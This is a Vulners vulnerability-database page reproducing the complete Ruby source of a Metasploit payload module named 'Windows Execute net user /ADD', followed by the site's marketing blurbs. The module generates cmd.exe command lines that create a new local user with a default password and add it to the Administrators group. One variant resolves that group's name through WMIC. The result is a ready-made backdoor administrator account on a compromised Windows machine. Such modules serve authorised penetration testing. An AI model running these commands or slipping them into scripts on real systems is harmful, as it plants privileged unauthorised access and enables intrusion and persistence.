Vulners
Lucene search
Windows Execute net user /ADD
🗓️ 11 Jul 2005 05:15:30Reported by hdm <[email protected]>, Chris John Riley, vlad902 <[email protected]>, sf <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 21 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# Extends the Exec payload to add a new user.
#
###
module MetasploitModule
CachedSize = 282
include Msf::Payload::Windows::Exec
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Execute net user /ADD',
'Description' => %q{
Create a new user and add them to local administration group.
Note: The specified password is checked for common complexity
requirements to prevent the target machine rejecting the user
for failing to meet policy requirements.
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
},
'Author' => ['hdm','Chris John Riley'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => true))
# Register command execution options
register_options(
[
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
OptString.new('PASS', [ true, "The password for this user", "Metasploit$1" ]),
OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
OptBool.new('WMIC', [ true, "Use WMIC on the target to resolve administrators group", false ]),
])
register_advanced_options(
[
OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
])
# Hide the CMD option...this is kinda ugly
deregister_options('CMD')
end
#
# Override the exec command string
#
def command_string
user = datastore['USER'] || 'metasploit'
pass = datastore['PASS'] || ''
cust = datastore['CUSTOM'] || ''
wmic = datastore['WMIC']
complexity= datastore['COMPLEXITY']
if(pass.length > 14)
raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
end
if complexity and pass !~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/
raise ArgumentError, "Password: #{pass} doesn't meet complexity requirements and may cause issues"
end
if not cust.empty?
print_status("Using custom group name #{cust}")
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup \"#{cust}\" #{user} /ADD"
elsif wmic
print_status("Using WMIC to discover the administrative group name")
return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" " +
"%G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
"FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
"net user #{user} #{pass} /ADD && " +
"net localgroup \"%X\" #{user} /ADD\""
else
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup Administrators #{user} /ADD"
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2020 10:31Current
0.2Low risk
Vulners AI Score0.2